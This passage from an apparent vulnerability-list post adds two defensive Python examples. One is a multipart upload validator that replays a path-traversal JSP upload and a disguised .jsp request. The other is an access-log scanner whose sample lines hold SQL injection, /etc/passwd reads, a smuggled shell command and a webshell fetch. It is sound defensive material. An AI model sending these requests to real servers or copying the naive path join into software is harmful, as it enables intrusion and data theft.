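The upload entries 192, 194, 199, 202 and 203 work for one reason: the handler trusts the client's filename and Content-Type, so a traversal filename (194) drops a JSP inside the deployed web application and a .jsp body declared as image/jpeg (203) passes a type check. The Python below is an added example, not any vendor's code: a minimal multipart/form-data parser, the naive path join that lets the traversal through, and the hardened check a handler should do instead (basename only, extension whitelist, magic-bytes check, declared type ignored). The two request bodies are reconstructed from entries 194 and 203 above (the 203 body is exactly the 210 bytes its Content-Length declares); the /opt/app/uploads directory and the whitelist are assumptions.

```python
"""Parse multipart/form-data uploads and contrast naive with hardened handling
of the filename and Content-Type (added example for entries 192/194/199/202/203)."""
import posixpath
import re

# Constructed inputs, reconstructed byte-for-byte from the requests above.
BOUNDARY_194 = b"----WebKitFormBoundaryKNt0t4vBe8cX9rZk"
BODY_194 = (
    b"------WebKitFormBoundaryKNt0t4vBe8cX9rZk\r\n"
    b'Content-Disposition: form-data; name="uploadFile"; '
    b'filename="../../../../../jboss/web/fe.war/hello.jsp"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b'<% out.println("hello");%>\r\n'
    b"------WebKitFormBoundaryKNt0t4vBe8cX9rZk\r\n"
    b'Content-Disposition: form-data; name="json"\r\n'
    b"\r\n"
    b'{"iq":{"query":{"UpdateType":"mail"}}}\r\n'
    b"------WebKitFormBoundaryKNt0t4vBe8cX9rZk--\r\n"
)
BOUNDARY_203 = b"----WebKitFormBoundaryt7WbDl1tXogoZys4"
BODY_203 = (
    b"------WebKitFormBoundaryt7WbDl1tXogoZys4\r\n"
    b'Content-Disposition: form-data; name="fj_file"; filename="11.jsp"\r\n'
    b"Content-Type:image/jpeg\r\n"
    b"\r\n"
    b'<% out.print("hello,eHR");%>\r\n'
    b"------WebKitFormBoundaryt7WbDl1tXogoZys4--\r\n"
)


def parse_multipart(body, boundary):
    """Return [(headers, data)] per part; header names are lowercased."""
    delimiter = b"--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:   # [0] is the (empty) preamble
        if chunk.startswith(b"--"):           # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):            # this CRLF belongs to the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, sep, value = line.partition(":")
            if sep:
                headers[key.strip().lower()] = value.strip()
        parts.append((headers, data))
    return parts


def disposition_params(value):
    """'form-data; name="a"; filename="b"' -> {'name': 'a', 'filename': 'b'}"""
    return dict(re.findall(r'(\w+)="([^"]*)"', value))


def naive_target_path(upload_dir, filename):
    """What a vulnerable handler does: join the client-supplied name as-is."""
    return posixpath.normpath(posixpath.join(upload_dir, filename))


# Hardened policy (assumption): extension whitelist plus the magic bytes each must start with.
ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".pdf": b"%PDF-"}


def validate_upload(filename, declared_type, data):
    """Return (ok, reason). Never trusts the client's filename or Content-Type."""
    normalised = filename.replace("\\", "/")
    base = posixpath.basename(normalised)
    if base != normalised or base in ("", ".", ".."):
        return False, "path separator or traversal in filename %r" % filename
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension %r not in whitelist" % ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content is not %s despite declared %s" % (ext, declared_type)
    return True, "accepted %s" % base


def triage(body, boundary):
    """Run every file part of a request body through validate_upload."""
    verdicts = []
    for headers, data in parse_multipart(body, boundary):
        params = disposition_params(headers.get("content-disposition", ""))
        if "filename" not in params:
            continue                          # ordinary form field (e.g. the "json" part)
        ok, reason = validate_upload(params["filename"], headers.get("content-type", ""), data)
        verdicts.append((params.get("name"), params["filename"], ok, reason))
    return verdicts


if __name__ == "__main__":
    print(naive_target_path("/opt/app/uploads", "../../../../../jboss/web/fe.war/hello.jsp"))
    for entry, body, boundary in (("194", BODY_194, BOUNDARY_194), ("203", BODY_203, BOUNDARY_203)):
        for verdict in triage(body, boundary):
            print(entry, verdict)
```

The naive join resolves the entry-194 filename to /jboss/web/fe.war/hello.jsp, outside the upload directory; the hardened check rejects it on the traversal alone, rejects 11.jsp on the extension regardless of the image/jpeg label, and would also reject a PHP file renamed to .jpg because the magic bytes do not match.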
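The post's stated purpose is risk screening for defenders, so the last added example (Python, not from the original post) screens combined-format web server access logs for the request targets in entries 187 to 203 and the generic payload classes they share. Request bodies are not in access logs, so for the POST-based entries (190, 193, 201 and the uploads) the rules can only match the path. The sample log lines are constructed from the requests above, not real traffic, and the rule names are mine.

```python
"""Screen combined-format access logs for the request signatures in entries
187-203 above (added example; constructed sample data, not real traffic)."""
import re
import urllib.parse

# Combined log format: ip - user [time] "METHOD target HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def normalise(path):
    """Percent-decode repeatedly (catches double encoding), turn '+' into a
    space and lowercase, so one regex covers the encoded variants."""
    decoded = path
    for _ in range(3):
        nxt = urllib.parse.unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.lower()


# (rule name, regex over the normalised request target); names are my own labels
RULES = [
    # vendor-specific endpoints from the list above
    ("mura_processasyncobject", re.compile(r"/_api/json/v1/default/\?.*method=processasyncobject")),
    ("lanwon_deletestudy_sqli", re.compile(r"/xds/deletestudy\.php\?.*documentuniqueid=")),
    ("dvmatrix_poihuoqu", re.compile(r"/admin/userinfo/poihuoqu")),
    ("esafenet_navigationajax", re.compile(r"/cdgserver3/.*navigationajax")),
    ("futong_uploademailattr", re.compile(r"/joinfapp/email/uploademailattr\?name=\.ashx")),
    ("hillstone_setsystemtime", re.compile(r"/master/ajaxactions/setsystemtimeaction\.php")),
    ("fe_uploadattachmentservlet", re.compile(r"/servlet/uploadattachmentservlet")),
    ("volans_send_order", re.compile(r"/send_order\.cgi\?parameter=operation")),
    ("fengsu_resetpasswordbysuper", re.compile(r"/cas/userctl/resetpasswordbysuper")),
    ("entsoft_quotegask", re.compile(r"/entsoft/quotegask_editaction\.entweb;\.js")),
    ("aliyundrive_webdav_sid", re.compile(r"/aliyundrive-webdav/query\?.*sid=[^&]*`")),
    ("cockpit_assetsmanager_upload", re.compile(r"/assetsmanager/upload")),
    ("seacms_dmku_sqli", re.compile(r"/dmplayer/dmku/\?.*ac=del.*sleep\(")),
    ("founder_binary_do", re.compile(r"/newsedit/newsplan/task/binary\.do")),
    ("redsea_ptfjk_upload", re.compile(r"/redseaplatform/ptfjk\.mob\?method=upload")),
    # generic indicators the same payload classes leave behind
    ("sql_time_delay", re.compile(r"waitfor\s+delay|sleep\(|randomblob\(")),
    ("local_file_read", re.compile(r"(?:file|poi)=(?:file:///|/etc/|\.\./)")),
    ("path_traversal_in_uri", re.compile(r"/\.\./")),
    ("webshell_fetch", re.compile(r"/(?:storage/uploads|_data/uploads)/[^/?]+\.(?:php|jsp|ashx)\b")),
]


def match_rules(raw_path):
    """Return the names of every rule the (normalised) request target matches."""
    target = normalise(raw_path)
    return [name for name, rx in RULES if rx.search(target)]


def scan(lines):
    """Return (ip, rule_name, raw_path) for every hit, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; skip rather than guess
        for name in match_rules(m.group("path")):
            hits.append((m.group("ip"), name, m.group("path")))
    return hits


# Constructed sample log lines modelled on the requests above (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2024:14:31:29 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:14:31:30 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:14:31:31 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 212 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:14: 31:32 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 97 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Jun/2024:14:31:33 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 19 "-" "curl/8.0"
192.0.2.9 - - [05/Jun/2024:14:31:34 +0800] "GET /storage/uploads/tttt.php HTTP/1.1" 200 4 "-" "curl/8.0"
192.0.2.9 - - [05/Jun/2024:14:31:35 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 12 "-" "curl/8.0"
10.0.0.4 - - [05/Jun/2024:14:31:36 +0800] "GET /index.php/attachment?file=report.pdf HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
10.0.0.4 - - [05/Jun/2024:14:31:37 +0800] "GET /js/player/dmplayer/dmku/?ac=list&id=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


if __name__ == "__main__":
    for ip, rule, path in scan(SAMPLE_LOG.splitlines()):
        print("%-14s %-28s %s" % (ip, rule, path))
```

Feed it the real access log instead of SAMPLE_LOG and group hits by source address: the two benign lines at the end show that a plain attachment download or a normal dmku listing does not fire, while every request taken from the list above does.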